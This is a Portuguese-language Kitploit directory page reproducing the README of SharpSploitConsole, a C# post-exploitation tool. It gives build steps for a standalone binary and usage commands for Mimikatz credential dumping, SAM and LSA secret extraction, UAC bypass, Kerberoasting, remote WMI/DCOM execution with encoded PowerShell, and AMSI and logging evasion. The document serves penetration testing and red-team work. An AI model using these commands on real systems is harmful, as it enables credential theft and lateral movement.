Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpSploitConsole — Aplicação de console em C# para operações de pós-exploração e red team, integrando SharpSploit para executar comandos Mimikatz, realizar Kerberoasting, contornar UAC, despejar credenciais e mover lateralmente via WMI/DCOM. | Kitploit
Ferramentas/GitHubGitHub/anthemtotheego/sharpsploitconsole
Escalada de PrivilégiosReconhecimentoAtaques de SenhaGeração de PayloadsEscaneamento de PortasExploraçãoMovimento LateralColeta de InformaçõesPós-Exploração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Testes de Penetração
Comando e Controle
Red Teaming
GitHubanthemtotheego/sharpsploitconsole

SharpSploitConsole

Aplicação de console em C# para operações de pós-exploração e red team, integrando SharpSploit para executar comandos Mimikatz, realizar Kerberoasting, contornar UAC, despejar credenciais e mover lateralmente via WMI/DCOM.

Ver Repositório
18236há 4 anosRevisado pelo Kitploit

SharpSploitConsole

Aplicativo de console projetado para interagir com o SharpSploit lançado por @cobbr_io > https://github.com/cobbr/SharpSploit

SharpSploit é uma ferramenta escrita por @cobbr_io que combina muitas técnicas/código C# da comunidade de segurança da informação e as une em uma única DLL bacana. É incrível, então confira!

Descrição

O SharpSploit Console é apenas um binário rápido de prova de conceito para ajudar testadores de penetração ou equipes vermelhas com menos experiência em C# a brincar com um pouco da grandiosidade que é o SharpSploit. Seguindo as instruções abaixo, você deve ser capaz de incorporar tanto o SharpSploit.dll quanto o System.Management.Automation.dll no binário do SharpSploitConsole, criando um executável independente que você pode colocar em um sistema alvo apropriado e executar em um shell não interativo (como o beacon).

Esse conceito pode ser aplicado a muitos binários C#. Por exemplo, poderíamos incorporar o System.Management.Automation.dll em nosso NoPowershell.exe favorito em C#, criando um binário que não depende do System.Management.Automation.dll no sistema alvo.

Por último, estou ciente de que existem provavelmente milhares de maneiras de tornar isso melhor, mais rápido, mais legal, mais furtivo, etc. Então, sinta-se à vontade para me avisar... de uma maneira educada. :) Também pretendo adicionar mais módulos e melhorar outros.

Contato em:

  • Twitter: @anthemtotheego or @g0ldengunsec

Antes de enviar problemas, esta ferramenta pode não ser atualizada ativamente. Encorajo você a pegar emprestado, adicionar, modificar e/ou criar suas próprias versões. Lembre-se, todo o código incrível por aí (e há muito) pode ser copiado/modificado para criar suas próprias ferramentas personalizadas.

Alt text Alt text

Configuração - Rápido e Sujo

Nota: Usei Windows 10, Visual Studio 2017 - os resultados podem variar

  1. Baixe a ferramenta SharpSploit de https://github.com/cobbr/SharpSploit.git

  2. Abra o SharpSploit.sln no Visual Studio e compile (certifique-se de compilar para a arquitetura correta) - Deve ver o menu suspenso com Any CPU > Clique nele e abra o Gerenciador de Configuração > em plataforma altere para a arquitetura desejada e selecione ok.

  3. Baixe a ferramenta SharpSploitConsole e abra o SharpSploitConsole.sln

  4. Copie tanto o SharpSploit.dll quanto o System.Management.Automation.dll encontrados no diretório SharpSploit/bin/x64/Debug para a pasta SharpSploitConsole/bin/x64/Debug

  5. Em seguida, configuraremos o Visual Studio para incorporar nossas DLLs em nosso EXE, para que possamos ter um único binário para executar em nossa máquina alvo. Faremos isso da seguinte maneira:

No Visual Studio:

a. Tools > NuGet Package Manager > Package Manager Console

b. No console, execute:

root@kitploit:~
  Install-Package Costura.Fody

c. Abra o bloco de notas e cole o código abaixo e salve-o com o nome FodyWeavers.xml dentro do diretório SharpSploitConsole que contém suas pastas bin, obj, properties.

root@kitploit:~
    <?xml version="1.0" encoding="utf-8"?>
    <Weavers>
      <Costura />
    </Weavers>

6. No Visual Studio, clique com o botão direito em Referências no lado direito, escolha Adicionar Referência, então navegue até o diretório SharpSploitConsole/bin/x64/Debug onde colocamos nossas duas DLLs, selecione-as e adicione-as.

  1. Compile, coloque o binário no computador alvo e divirta-se.

Exemplos

Nota: Todos os comandos não diferenciam maiúsculas de minúsculas

Por padrão, todos os comandos podem ser fornecidos como argumentos de linha de comando, eles serão executados e o programa será encerrado (ótimo para shells remotos). Isso se parece com algo como: sharpSploitConsole.exe getSystem logonPasswords. Alternativamente, se você quiser usar o modo de console interativo, pode usar o comando interact para obter um shell pseudo-interativo.

Iniciar modo de console interativo:

Interact

Mimikatz para tudo (não executa DCSync) - requer admin ou system:

Mimi-All

Executa um comando Mimikatz específico de sua escolha - requer admin ou system:

Mimi-Command privilege::debug sekurlsa::logonPasswords

Executa o comando Mimikatz privilege::debug sekurlsa::logonPasswords - requer admin ou system:

logonPasswords

Executa o comando Mimikatz para recuperar hashes de Credenciais em Cache do Domínio do registro - requer admin ou system:

LsaCache

Executa o comando Mimikatz para recuperar Segredos LSA armazenados no registro - requer admin ou system:

LsaSecrets

Recuperar hashes de senha do banco de dados SAM - requer admin ou system:

SamDump

Recuperar credenciais Wdigest do registro - requer admin ou system:

Wdigest

Recuperar usuário atual:

whoami

Username

Personificar usuário do sistema - requer direitos de admin:

GetSystem

Personificar usuário do sistema - Personificar o token de um processo específico, requer pid - comando requer direitos de admin:

Impersonate 2918

Ignorar UAC - requer binário | comando | caminho para o binário - requer direitos de admin:

BypassUAC cmd.exe ipconfig C:\Windows\System32\

BypassUAC cmd.exe "" C:\Windows\System32\

Encerra a personificação de qualquer token, retorna ao token inicial associado ao processo atual:

RevertToSelf

Recuperar diretório de trabalho atual:

CurrentDirectory

Recuperar listagem do diretório atual:

DirectoryListing

Altera o diretório atual anexando uma string especificada ao diretório de trabalho atual:

ChangeDirectory SomeFolder

Recuperar nome do host:

Hostname

Recuperar lista de processos em execução:

ProcessList

Cria um minidump da memória de um processo em execução, requer PID | local de saída | nome de saída - requer admin:

ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp

Recuperar valor do caminho do registro, requer argumento de caminho completo:

ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber

Escrever no registro, requer argumento de caminho completo e argumento de valor:

WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1

Recuperar usuários de grupo local remotamente, requer nome do computador | nome do grupo | nome de usuário | senha:

NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!

NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!

Recuperar grupos locais remotamente, requer nome do computador | nome de usuário | senha:

NetLocalGroups computerName domain\username P@55w0rd!

NetLocalGroups 192.168.1.20 .\username P@55w0rd!

Recuperar usuários atualmente logados remotamente, requer nome do computador | nome de usuário | senha:

NetLoggedOnUsers computerName domain\username P@55w0rd!

NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!

Recuperar sessões de usuário remotamente, requer nome do computador | nome de usuário | senha:

NetSessions computerName domain\username P@55w0rd!

NetSessions 192.168.1.20 .\username P@55w0rd!

Pingar sistemas, requer nomes de computadores:

Ping computer1 computer2 computer3 computer4

Escaneamento de portas em sistemas, requer nome do computador | portas:

PortScan computer1 80 443 445 22 23

Obter Usuários do Domínio, Obtém objetos de usuário especificados (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual. argumentos opcionais: -username -password -domain -server -searchbase -searchstring -target:

GetDomainUsers

Obter Grupos do Domínio, Obtém objetos de grupo especificados (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual. argumentos opcionais: -username -password -domain -server -searchbase -searchstring -target:

GetDomainGroups

GetDomainGroups -target "Domain Admins"

Obter Computadores do Domínio, Obtém objetos de computador especificados (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual. argumentos opcionais: -username -password -domain -server -searchbase -searchstring -target:

GetDomainComputers

Executar Kerberoasting, Realiza um ataque de kerberoasting contra objetos de usuário alvo (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual. argumentos opcionais: -username -password -domain -server -searchbase -searchstring -target

Kerberoast

Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService

Executar comando remotamente via WMI, requer nome do computador | nome de usuário | senha | comando - requer admin:

WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>

WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>

Executar comando remotamente via DCOM, requer nome do computador | comando | diretório | parâmetros - requer admin:

DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>

Executar comando shell:

Shell ipconfig /all

Executar comando powershell enquanto tenta ignorar AMSI, registro de scriptBlock e registro de módulo:

Powershell -noP -sta -w 1 -enc <Base64>

Opções atualmente disponíveis (mais por vir)

  • Interact : Inicia o modo de console interativo, se você estiver interagindo remotamente, talvez não queira usar esta opção
  • Mimi-All : Executa tudo exceto DCSync, requer admin
  • Mimi-Command : Executa um comando Mimikatz escolhido
  • logonPasswords : Executa privilege::debug sekurlsa::logonPasswords
  • LsaCache : Recupera hashes de Credenciais em Cache do Domínio do registro
  • LsaSecrets : Recupera segredos LSA armazenados no registro
  • SamDump : Recupera hashes de senha do banco de dados SAM
  • Wdigest : Recupera credenciais Wdigest do registro
  • whoami : Recupera o usuário atual
  • GetSystem : Personifica o usuário do sistema, requer direitos de admin
  • Impersonate : Personifica o token de um processo específico, requer pid - comando requer direitos de admin.
  • BypassUAC : Ignora UAC, requer binário | comando | caminho para o binário - requer direitos de admin
  • RevertToSelf : Encerra a personificação de qualquer token, retorna ao token inicial associado ao processo atual
  • CurrentDirectory : Recupera o diretório de trabalho atual
  • DirectoryListing : Recupera a listagem do diretório atual
  • ChangeDirectory : Altera o diretório atual anexando uma string especificada ao diretório de trabalho atual
  • Hostname : Recupera o nome do host
  • ProcessList : Recupera a lista de processos em execução
  • ProcDump : Cria um minidump da memória de um processo em execução, requer PID | local de saída | nome de saída - requer admin
  • Username : Recupera o nome de usuário atual
  • ReadRegistry : Recupera o valor do caminho do registro, requer argumento de caminho completo
  • WriteRegistry : Escreve no registro, requer argumento de caminho completo | valor
  • NetLocalGroupMembers : Recupera usuários de grupo local remotamente, requer nome do computador | nome do grupo | nome de usuário | senha
  • NetLocalGroups : Recupera grupos locais remotamente, requer nome do computador | nome de usuário | senha
Baixar ferramenta
  • NetLoggedOnUsers : Recupera usuários atualmente logados remotamente, requer nome do computador | nome de usuário | senha
  • NetSessions : Recupera sessões de usuário remotamente, requer nome do computador | nome de usuário | senha
  • Ping : Pingar sistemas, requer nomes de computadores"
  • PortScan : Escaneamento de portas em sistemas, requer nome do computador | portas
  • GetDomainUsers : Obtém objetos de usuário especificados (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual
  • GetDomainGroups : Obtém objetos de grupo especificados (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual
  • GetDomainComputers : Obtém objetos de computador especificados (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual
  • Kerberoast : Realiza um ataque de kerberoasting contra objetos de usuário alvo (ou todos) no domínio alvo, por padrão usará o contexto do usuário atual
  • WMI : Executar comando remotamente via WMI, requer nome do computador | nome de usuário | senha | comando | requer admin
  • DCOM : Executar comando remotamente via DCOM, requer nome do computador | comando | diretório | parâmetros - requer admin
  • Shell : Executar um comando shell
  • Powershell : Executa um comando powershell enquanto tenta ignorar AMSI, registro de scriptBlock e registro de módulo